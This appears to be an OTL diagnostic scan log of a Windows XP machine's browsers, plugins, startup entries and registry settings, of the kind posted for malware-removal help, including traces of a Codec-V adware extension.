========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>

========== FireFox ==========

FF - prefs.js..browser.search.order.1: "Search"
FF - prefs.js..browser.startup.homepage: "www.startpage.com"
FF - prefs.js..extensions.enabledItems: [email protected]:1.0
FF - prefs.js..extensions.enabledItems: {ABDE892B-13A8-4d1b-88E6-365A6E755758}:1.0
FF - prefs.js..extensions.enabledItems: {3f963a5b-e555-4543-90e2-c3908898db71}:10.0.0.1167
FF - prefs.js..keyword.URL: "http://search.mywebs...10101070100&s="

FF - user.js..browser.search.order.1: "Search"
FF - user.js..keyword.URL: "http://search.mywebs...10101070100&s="

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@bittorrent.com/BitTorrentDNA: C:\Program Files\DNA\plugins\npbtdna.dll (BitTorrent, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Content Upload Plugin,version=1.0.0: File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Player Plugin,version=1.0.0: File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Motive.com/NpMotive,version=1.0: C:\Program Files\Common Files\Motive\npMotive.dll (Alcatel-Lucent)
FF - HKLM\Software\MozillaPlugins\@real.com/RhapsodyPlayerEngine,version=1.1: File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=8: File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@adobe.com/FlashPlayer: File not found

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2011/12/20 09:19:45 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\AVAST Software\Avast\WebRep\FF [2013/01/14 19:24:00 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/01/10 21:17:06 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

[2008/08/27 05:09:54 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Extensions
[2013/01/11 09:03:21 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions
[2013/01/11 09:03:21 | 000,000,000 | ---D | M] ("Codec-V") -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\[email protected]
[2013/01/11 09:03:20 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\[email protected]\chrome\content\extensionCode
[2013/01/10 21:14:59 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2011/12/20 09:19:45 | 000,000,000 | ---D | M] (DivX Plus Web Player HTML5 <video>) -- C:\PROGRAM FILES\DIVX\DIVX PLUS WEB PLAYER\FIREFOX\DIVXHTML5
[2013/01/10 21:17:04 | 000,262,704 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012/10/12 21:17:06 | 000,002,465 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
[2012/10/12 21:17:06 | 000,002,058 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:acceptedSuggestion}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}sourceid=chrome&ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&hl={language}&q={searchTerms}&sugkey={google:suggestAPIKeyParameter}
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\pdf.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin2.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin3.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin4.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin5.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin6.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin7.dll
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npdrmv2.dll
CHR - plugin: Windows Media Player Plug-in Dynamic Link Library (Enabled) = C:\Program Files\Windows Media Player\npdsplay.dll
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npwmsdrm.dll
CHR - plugin: Motive Plugin (Enabled) = C:\Program Files\Common Files\Motive\npMotive.dll
CHR - plugin: DNA Plug-in (Enabled) = C:\Program Files\DNA\plugins\npbtdna.dll
CHR - plugin: DivX VOD Helper Plug-in (Enabled) = C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll
CHR - plugin: DivX Plus Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll
CHR - plugin: iTunes Application Detector (Enabled) = C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll
CHR - plugin: Windows Presentation Foundation (Enabled) = c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
CHR - Extension: Google Docs = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.4_0\
CHR - Extension: Google Drive = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\
CHR - Extension: Google Search = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\
CHR - Extension: avast! WebRep = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\icmlaeflemplmjndnaapfdbbnpncnbda\7.0.1474_0\
CHR - Extension: Codec-V = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho\1.20.67_0\crossrider
CHR - Extension: Codec-V = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho\1.20.67_0\
CHR - Extension: DivX Plus Web Player HTML5 \u003Cvideo\u003E = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm\2.1.2.145_0\
CHR - Extension: Gmail = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\

O1 HOSTS File: ([2013/01/18 20:21:08 | 000,000,027 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: (Adobe PDF Reader Link Helper) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O2 - BHO: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (no name) - - No CLSID value found.
O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O3 - HKCU\..\Toolbar\ShellBrowser: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O3 - HKCU\..\Toolbar\WebBrowser: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O4 - HKLM..\Run: [avast] C:\Program Files\AVAST Software\Avast\avastUI.exe (AVAST Software)
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe (HP)
O4 - HKLM..\Run: [Logitech Utility] C:\WINDOWS\LOGI_MWX.EXE (Logitech Inc.)
O4 - HKLM..\Run: [Windstream_BCUC_McciTrayApp] C:\Program Files\Windstream_BCUC\McciTrayApp.exe (Alcatel-Lucent)
O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe (SUPERAntiSpyware.com)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.micr...heckControl.cab (Windows Genuine Advantage Validation Tool)
O16 - DPF: {5ED80217-570B-4DA9-BF44-BE107C0EC166} http://cdn.scan.onec...lscbase6770.cab (Windows Live Safety Center Base Module)
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} http://www.update.mi...b?1192293460281 (MUWebControl Class)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.m...ash/swflash.cab (Shockwave Flash Object)
O16 - DPF: {EFD3EA56-234D-4240-90EA-CC9FA3AF5A01} https://care.windstr...TELControls.cab (ConnectivityTester Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{4B8689F4-82D6-40F3-A1C1-1A5487DCE17D}: DhcpNameServer = 192.168.1.1
O18 - Protocol\Handler\cetihpz {CF184AD3-CDCB-4168-A3F7-8E447D129300} - C:\Program Files\HP\hpcoretech\comp\hpuiprot.dll (Hewlett-Packard Company)
O20 - HKLM Winlogon: Shell - (Explorer.exe) -C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) -C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\igfxcui: DllName - (igfxsrvc.dll) - C:\WINDOWS\System32\igfxsrvc.dll (Intel Corporation)
O24 - Desktop WallPaper: C:\Documents and Settings\Owner\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Owner\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O28 - HKLM ShellExecuteHooks: {091EB208-39DD-417D-A5DD-7E2C2D8FB9CB} - C:\Program Files\Windows Defender\MpShHook.dll (Microsoft Corporation)
O28 - HKLM ShellExecuteHooks: {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL (SuperAdBlocker.com)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2004/05/12 00:25:35 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O32 - AutoRun File - [2013/01/18 19:26:54 | 000,000,000 | R--D | M] - C:\autorun.inf -- [ NTFS ]
O32 - AutoRun File - [2013/01/18 19:26:56 | 000,000,000 | R--D | M] - D:\autorun.inf -- [ FAT32 ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*

NetSvcs: 6to4 - File not found
NetSvcs: AppMgmt - File not found
NetSvcs: HidServ - File not found
NetSvcs: Ias - File not found
NetSvcs: Iprip - File not found
NetSvcs: Irmon - File not found
NetSvcs: NWCWorkstation - File not found
NetSvcs: Nwsapagent - File not found
NetSvcs: WmdmPmSp - File not found

MsConfig - StartUpFolder: C:^Documents and Settings^All Users^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk - C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe - (Hewlett-Packard Co.)
MsConfig - StartUpFolder: C:^Documents and Settings^All Users^Start Menu^Programs^Startup^Logitech Desktop Messenger.lnk - Reg Error: Value error. - File not found
MsConfig - StartUpReg: Alcmtr - hkey= - key= - C:\WINDOWS\ALCMTR.EXE (Realtek Semiconductor Corp.)
MsConfig - StartUpReg: AlcWzrd - hkey= - key= - C:\WINDOWS\ALCWZRD.EXE (RealTek Semicoductor Corp.)
MsConfig - StartUpReg: AppleSyncNotifier - hkey= - key= - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe (Apple Inc.)
MsConfig - StartUpReg: BackupNotify - hkey= - key= - c:\Program Files\HP\Digital Imaging\bin\BackupNotify.exe (Hewlett-Packard Company)
MsConfig - StartUpReg: ctfmon.exe - hkey= - key= - File not found
MsConfig - StartUpReg: DAEMON Tools Lite - hkey= - key= - C:\Program Files\DAEMON Tools Lite\daemon.exe (DT Soft Ltd)
MsConfig - StartUpReg: HotKeysCmds - hkey= - key= - File not found
MsConfig - StartUpReg: HP Component Manager - hkey= - key= - C:\Program Files\HP\hpcoretech\hpcmpmgr.exe (Hewlett-Packard Company)
MsConfig - StartUpReg: HP Software Update - hkey= - key= - C:\Program Files\HP\HP Software Update\hpwuSchd2.exe (Hewlett-Packard)
MsConfig - StartUpReg: HPHmon05 - hkey= - key= - File not found
MsConfig - StartUpReg: HPHUPD05 - hkey= - key= - c:\Program Files\HP\{45B6180B-DCAB-4093-8EE8-6164457517F0}\hphupd05.exe (Hewlett-Packard)
MsConfig - StartUpReg: hpqSRMon - hkey= - key= - C:\Program Files\HP\Digital Imaging\bin\HpqSRmon.exe (Hewlett-Packard)
MsConfig - StartUpReg: IgfxTray - hkey= - key= - File not found
MsConfig - StartUpReg: iTunesHelper - hkey= - key= - C:\Program Files\iTunes\iTunesHelper.exe (Apple Inc.)
MsConfig - StartUpReg: KernelFaultCheck - hkey= - key= - File not found
MsConfig - StartUpReg: MSMSGS - hkey= - key= - C:\Program Files\Messenger\msmsgs.exe (Microsoft Corporation)
MsConfig - StartUpReg: Recguard - hkey= - key= - C:\WINDOWS\SMINST\Recguard.exe ()
MsConfig - StartUpReg: SoundMan - hkey= - key= - C:\WINDOWS\SOUNDMAN.EXE (Realtek Semiconductor Corp.)
MsConfig - State: "system.ini" - 0
MsConfig - State: "win.ini" - 0
MsConfig - State: "bootini" - 0
MsConfig - State: "services" - 0
MsConfig - State: "startup" - 2

SafeBootMin: !SASCORE - File not found
SafeBootMin: AppMgmt - File not found
SafeBootMin: Base - Driver Group
SafeBootMin: Boot Bus Extender - Driver Group
SafeBootMin: Boot file system - Driver Group
SafeBootMin: File system - Driver Group
SafeBootMin: Filter - Driver Group
SafeBootMin: PCI Configuration - Driver Group
SafeBootMin: PNP Filter - Driver Group
SafeBootMin: Primary disk - Driver Group
SafeBootMin: SCSI Class - Driver Group
SafeBootMin: sermouse.sys - Driver
SafeBootMin: System Bus Extender - Driver Group
SafeBootMin: vds - Service
SafeBootMin: vga.sys - Driver
SafeBootMin: WinDefend - C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation)
SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootMin: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy
SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

SafeBootNet: !SASCORE - File not found
SafeBootNet: AppMgmt - File not found
SafeBootNet: Base - Driver Group
SafeBootNet: Boot Bus Extender - Driver Group
SafeBootNet: Boot file system - Driver Group
SafeBootNet: File system - Driver Group
SafeBootNet: Filter - Driver Group
SafeBootNet: NDIS Wrapper - Driver Group
SafeBootNet: NetBIOSGroup - Driver Group
SafeBootNet: NetDDEGroup - Driver Group
SafeBootNet: Network - Driver Group
SafeBootNet: NetworkProvider - Driver Group
SafeBootNet: PCI Configuration - Driver Group
SafeBootNet: PNP Filter - Driver Group
SafeBootNet: PNP_TDI - Driver Group
SafeBootNet: Primary disk - Driver Group
SafeBootNet: SCSI Class - Driver Group
SafeBootNet: sermouse.sys - Driver
SafeBootNet: Streams Drivers - Driver Group
SafeBootNet: System Bus Extender - Driver Group
SafeBootNet: TDI - Driver Group
SafeBootNet: vga.sys - Driver
SafeBootNet: WinDefend - C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation)
SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net
SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient
SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService
SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans
SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun)
ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608555} - Internet Explorer Classes for Java
ActiveX: {0fde1f56-0d59-4fd7-9624-e3df6b419d0f} - IEEX
ActiveX: {10072CEC-8CC1-11D1-986E-00A0C955B42F} - Vector Graphics Rendering (VML)
ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - NetShow
ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 6.4
ActiveX: {283807B5-2C60-11D0-A31D-00AA00B92C03} - DirectAnimation
ActiveX: {2A3320D6-C805-4280-B423-B665BDE33D8F} - Microsoft .NET Framework 1.1 Security Update (KB979906)
ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX: {3bf42070-b3b1-11d1-b5c5-0000f8051515} - Uniscribe
ActiveX: {411EDCF7-755D-414E-A74B-3DCD6583F589} - Microsoft .NET Framework 1.1 Service Pack 1 (KB867460)
ActiveX: {4278c270-a269-11d1-b5bf-0000f8051515} - Advanced Authoring
ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install
ActiveX: {44BBA842-CC51-11CF-AAFA-00AA00B6015B} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT
ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - DirectShow
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015C} - Microsoft DirectX
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.8
ActiveX: {5945c046-1e7d-11d1-bc44-00c04fd912be} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser
ActiveX: {5A8D6EE0-3E18-11D0-821E-444553540000} - ICW
ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX: {6C298884-91FD-408C-9D90-5A59D2C29FD1} - Microsoft .NET Framework 1.1 Security Update (KB2742597)
ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX: {7131646D-CD3C-40F4-97B9-CD9E4E6262EF} - .NET Framework
ActiveX: {73FA19D0-2D75-11D2-995D-00C04F98BBC9} - Web Folders
ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\WINDOWS\system32\ie4uinit.exe -BaseSettings
ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - c:\WINDOWS\system32\Rundll32.exe c:\WINDOWS\system32\mscories.dll,Install
ActiveX: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files\Google\Chrome\Application\24.0.1312.52\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
ActiveX: {8b15971b-5355-4c82-8c07-7e181ea07608} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\fxsocm.inf,Fax.Install.PerUser
ActiveX: {8F736E10-8E5C-4399-A532-D0C00A406227} - Microsoft .NET Framework 1.1 Security Update (KB2698023)
ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX: {94de52c8-2d59-4f1b-883e-79663d2d9a8c} - Fax Provider
ActiveX: {96543d59-497a-4801-a1f3-5936aacaf7b1} - Q828750
ActiveX: {B508B3F1-A24A-32C0-B310-85786919EF28} - .NET Framework
ActiveX: {C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F} - .NET Framework
ActiveX: {C3C986D6-06B1-43BF-90DD-BE30756C00DE} - RevokedRootsUpdate
ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX: {CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1} - .NET Framework
ActiveX: {CC2A9BA0-3BDD-11D0-821E-444553540000} - Task Scheduler
ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1
ActiveX: {D27CDB6E-AE6D-11CF-96B8-444553540000} - Macromedia Shockwave Flash
ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX: {eddbec60-89cb-44ef-8291-0850fd28ff6a} - Q832894
